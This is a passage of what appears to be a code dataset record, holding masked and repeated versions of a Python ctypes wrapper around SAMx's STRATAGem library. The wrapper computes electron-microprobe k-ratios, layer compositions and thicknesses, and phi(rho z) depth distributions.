list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n <mask token>\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-2": "<mask token>\n\n\nclass Stratagem:\n <mask token>\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\\\SAMx\\\\Stratagem\\\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY\n ) as key:\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n cwd = os.getcwd()\n try:\n logger.debug('dll=%s', dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd)\n logger.debug('StEnableErrorDisplay(%r)', display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {}\n self._substrate = None\n self._experiments = {}\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n <mask token>\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. Call close() first.')\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n self.reset()\n <mask token>\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = sample.substrate, index\n <mask token>\n <mask token>\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. \n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n logger.debug('StSdAddLayer(key)')\n ilayer_ = self._lib.StSdGetNbLayers(key)\n logger.debug('StSdAddLayer(key, %i)', ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error('Cannot add layer')\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error('Cannot add element')\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error('Cannot set atomic number')\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n wf_ = c.c_double(wf)\n logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error('Cannot set concentration')\n logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)\n ):\n self._raise_error('Cannot set concentration flag')\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1000.0\n else:\n density = 10.0\n density_ = c.c_double(density)\n if thick_known:\n thickness = layer.thickness_m * 10000000000.0\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error('Cannot set thickness')\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n key_ = self._stobjectnew(standard=True)\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error('Cannot save standard')\n self._lib.StObjectDelete(key_)\n self._tmpstandards.append(filepath)\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1000.0)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,\n experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.\n byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error('Cannot add atomic number and line')\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,\n iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_\n ):\n self._raise_error('Cannot set standard')\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error('Cannot add experiment analyzed flag')\n kratio_ = c.c_double(experiment.kratio)\n logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',\n ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /\n 1000.0, experiment.energy_eV / 1000.0, experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,\n hv_, kratio_, c.c_double(0.0), c.c_int(2)):\n self._raise_error('Cannot set experiment k-ratio')\n if experiment.is_analyzed():\n indexes = ielt_.value, iline_.value, iexpk_.value\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n <mask token>\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(\n tilt_), c.byref(azimuth_)):\n self._raise_error('Cannot get geometry parameters')\n return toa_.value, tilt_.value, azimuth_.value\n <mask token>\n <mask token>\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n <mask token>\n <mask token>\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n <mask token>\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n <mask token>\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n <mask token>\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n <mask token>\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-3": "<mask token>\nlogger = logging.getLogger(__name__)\n<mask token>\ntry:\n import winreg\nexcept ImportError:\n try:\n import _winreg as winreg\n except ImportError:\n\n\n class winreg:\n HKEY_CURRENT_USER = None\n\n\n class _PyHKEY(object):\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def OpenKey(self, key, sub_key, res, sam):\n return self._PyHKEY()\n\n def QueryValueEx(self, key, value_name):\n return None\n<mask token>\n_REGISTRY_KEY = 'Software\\\\SAMx\\\\Stratagem\\\\Configuration'\n_REGISTRY_VALUENAME = 'InstallOEMDirectory'\nPRZMODE_XPP = 0\n<mask token>\nPRZMODE_PAP = 1\n<mask token>\nPRZMODE_GAU = 2\n<mask token>\nFLUORESCENCE_NONE = 0\n<mask token>\nFLUORESCENCE_LINE = 1\n<mask token>\nFLUORESCENCE_LINE_CONT = 2\n<mask token>\n_CONCENTRATION_FLAG_KNOWN = 0\n_CONCENTRATION_FLAG_UNKNOWN = 1\n_CONCENTRATION_FLAG_STOICHIOMETRIC = 2\n_CONCENTRATION_FLAG_TRACE = 3\n_CONCENTRATION_FLAG_DIFFERENCE = 4\n\n\nclass StratagemError(Exception):\n \"\"\"\n Exception raised for all errors related to the STRATAGem interface.\n \"\"\"\n pass\n\n\ndef _check_key(method):\n\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n if self._key is None:\n raise StratagemError('Not initialize. Call init().')\n return method(self, *args, **kwargs)\n return wrapper\n\n\nclass Stratagem:\n \"\"\"\n Main interface establishing a connection to the STRATAGem OEM interface and\n perform calculations using SAMx's STRATAGem.\n It is highly recommended to use :class:`Stratagem` as a context manager \n (i.e. ``with`` statement) to ensure that the connection to the DLL is \n properly closed.\n For instance::\n \n >>> with Stratagem() as strata:\n ... strata.prz_mode = PRZMODE_XPP\n \n Otherwise the following series of method must be called::\n \n >>> strata = Stratagem()\n >>> strata.init()\n >>> strata.prz_mode = PRZMODE_XPP\n >>> strata.close()\n \"\"\"\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\\\SAMx\\\\Stratagem\\\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY\n ) as key:\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n cwd = os.getcwd()\n try:\n logger.debug('dll=%s', dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd)\n logger.debug('StEnableErrorDisplay(%r)', display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {}\n self._substrate = None\n self._experiments = {}\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n\n def _stobjectnew(self, key=None, standard=False):\n if key is None:\n characters = string.ascii_lowercase\n key = ''.join(random.choice(characters) for _ in range(8))\n key = key.encode('ascii')\n if not isinstance(key, c.c_byte):\n key = c.create_string_buffer(key)\n bnormal_ = c.c_bool(not standard)\n iniflags_ = c.c_int(0)\n logger.debug('StObjectNew(key, %r, %i)', not standard, 0)\n if not self._lib.StObjectNew(key, bnormal_, iniflags_):\n self._raise_error('Cannot create object')\n return key\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. Call close() first.')\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n self.reset()\n\n def reset(self):\n \"\"\"\n Resets all parameters to the defaults, remove all experiments and sample.\n \"\"\"\n if self._key:\n self._lib.StObjectReset(self._key)\n os.chdir(self._cwd)\n self._layers.clear()\n self._substrate = None\n self._experiments.clear()\n self._tmpstandards.clear()\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = sample.substrate, index\n\n @_check_key\n def get_sample(self):\n \"\"\"\n Returns the current sample. \n It can correspond to the sample defined by :meth:`set_sample` or the\n sample resulting from the computations (see :meth:`compute`).\n \n .. note:: a new sample is returned every time this method is called\n \n :return: current sample\n :rtype: :class:`Sample`\n \"\"\"\n sample = Sample(self._substrate[0].composition)\n for layer in 